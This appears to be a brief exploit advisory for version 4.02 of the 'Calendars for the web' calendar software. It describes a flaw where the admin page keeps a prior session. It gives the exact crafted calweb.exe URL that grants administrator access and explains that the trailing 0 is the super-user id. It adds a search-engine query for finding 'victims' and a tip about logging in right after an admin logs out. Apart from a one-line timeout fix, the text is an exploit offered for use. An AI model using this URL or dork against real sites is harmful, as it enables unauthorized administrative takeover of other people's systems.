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Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
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Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.
Exploit:
Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe
After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
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how to fix: set time out for login to five minutes !
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A Google query can find a couple pages of victims: inurl:calweb/calweb.exe
Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.
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